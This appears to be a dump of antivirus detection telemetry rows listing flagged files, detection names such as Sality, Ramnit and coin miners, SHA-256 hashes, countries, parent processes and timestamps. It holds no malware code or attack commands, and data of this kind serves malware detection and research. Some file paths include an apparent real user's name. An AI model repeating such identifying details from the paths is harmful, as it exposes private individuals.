  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\IBZLUTVP79\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='9706a9c3c65a749f585c2bfe8777732513b60494ab309387c307f022b265d223', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T04:05:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='removeassinaturapramim.exe', filepath='C:\\Users\\X\\Desktop\\RemoveAssinaturaPraMim\\RemoveAssinaturaPraMim.exe', filesize=512000, name='TR/Spy.Banker.Gen.#M300.#R3644'), hash='6f1e01d3c6ba1641c7b10604ac1c392b8133912c6b04f8a6d9c4750ebb5c15e6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:18:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160828-3ee29702', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-160810-3B8671CF\\AVSCAN-20181104-160828-3EE29702', filesize=1984000, name='TR/Dldr.Agent.edni.#M1.#R1'), hash='93d9fb9908aeca3a6e6ae77300a18310e9a76c83340d97df2ed19414efe86712', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240ec', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240ec', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:43:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001435-7b1247af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001435-7B1247AF', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_15c27930.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_15c27930.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130547-fe862878', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130547-FE862878', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxaa2ff.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaA2FE.tmp\\dxaA2FF.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0006222d', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0006222d', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filepath='C:\\Users\\X\\AppData\\Roaming\\Apple Computer\\MobileSync\\Backup\\7ae31f6cc9795fd2a07cdede1da8b3c615ad2198\\Snapshot\\0c\\0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filesize=8000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline='--pipe \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\30700600-16829416314110908', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Common Files\\Apple\\Mobile Device Support\\AppleMobileBackup.exe', parentsize=67896, timestamp='2018-11-04T12:27:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:41:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winrar.exe', filepath='\\\\?\\C:\\Program Files\\WinRAR\\WinRAR.exe', filesize=1068000, name='W32/Ramnit.C.#M1.#R1'), hash='281c030c6f339be9d06a0122ea294b463cebdd6f361a20fa50821150bba55478', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hh515-024-16.xls', filepath='C:\\Users\\X\\Desktop\\LIMPIEZA ESCRITORIO\\Nueva carpeta (4)\\RESTORED\\2017-09-15_10-26-14\\HH515-024-16.XLS', filesize=192000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='1bc182f69c54e17136f57733ac8cd0c0d5b723a84de94bdaa717e6d1b87be390', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T15:53:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm8063.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T15:25:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atelier ce louga.exe', filepath='G:\\atelier CE Louga.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad37fb4.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad37FB4.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:17:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие.exe', filepath='F:\\Проф\\Бланк письма 2014 пособие.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='40b170ee3189ac12ebd377ec75402037e2213c6654ee16babac198c31513e6cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182203.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp95\\A0182203.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='46364ba1424c62b9b1405113f2cffa88d9dac0c34752eb4baefb3b813cbc3409', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0006230f', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0006230f', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:48:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:06:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jerus~79.exe', filepath='C:\\Users\\X\\Desktop\\6000 Virus Collection IrFan_1933 or XyberDexstop\\() --- ()\\DANGEROUS (Fvck1933)\\JERUS~79.EXE', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:36:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='banditry.dll', filepath='\\\\?\\C:\\Program Files (x86)\\leiber\\banditry.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='1fd9fc5ca54978fa144f9cf5e013d171733ab5788bf02930260c68a8e49bdf05', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='samp-server.exe', filepath='C:\\Users\\X\\Desktop\\zeno\\oLD sTREET\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='a2f3a38e346a138b082cab0efcf162ac24e47c14ac55c660a3f4fe4e9060af48', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe17_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T02:23:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104736-577c515f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104704-5390E50B\\AVSCAN-20181104-104736-577C515F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='G:\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install_virtualdj_home_v7.0.5.exe', filepath='H:\\Documents and Settings\\X\\Mis documentos\\Descargas\\install_virtualdj_home_v7.0.5.exe', filesize=36608000, name='W32/Ramnit.C.#M1.#R1'), hash='99a40e3bc3d8395506ee2b5c979086de92142cac9bd378ff68ca3ea3564b82e4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:50:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215717-7e619c32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215717-7E619C32', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065525-b355d71c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065525-B355D71C', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='be585185e1bfcdbf386f82a7a88b9fd501ade8545af0a25d6550612392143655', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:55:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='23342e27-aa9e-7f1f-c2ac-ebeea49755cc', filepath='C:\\Windows\\System32\\MRT\\6F31010B-5919-41C2-94FB-E71E8EEE9C9A\\FilesStash\\23342E27-AA9E-7F1F-C2AC-EBEEA49755CC', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c946c2ae98caeb19bee46baa79fa2bdff9b87cd443d27a4ca515ff6a93ebf1e1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T01:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T01:03:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zlvgjaes.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ZLVGjAES.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091131-0438a905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-091131-0438A905', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101740-8b60fef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101715-87D3D321\\AVSCAN-20181102-101740-8B60FEF5', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oyjk.exe', filepath='c:\\users\\X\\appdata\\roaming\\oyjk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172911-fa6eb2ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b889aa9\\AVSCAN-20181102-171958-AA3956B6\\AVSCAN-20181102-172911-FA6EB2AD', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T21:29:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsw7C67.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trza781.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trzA781.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='formsdonottrust.html', filepath='C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='7e74739db11fa3f7ae6912f47ad08f2c696f854cbb66da42d827d8669dbeed88', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='68 mustang fastback.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\68 mustang fastback\\68 mustang fastback.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='d5e034cc16878cd4cdfeba80a60ab374fdf9ff2a33a1db4b33a6ede0a6c2c3f4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsb12F2.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8944344, timestamp='2018-11-02T11:50:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='842272f756ee756fac0ae3d2ff9fcad19b6891feaa61e8ddd0f09f2156c403c4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:17Z'), dt=datetime.date(2018, 11, 2)),
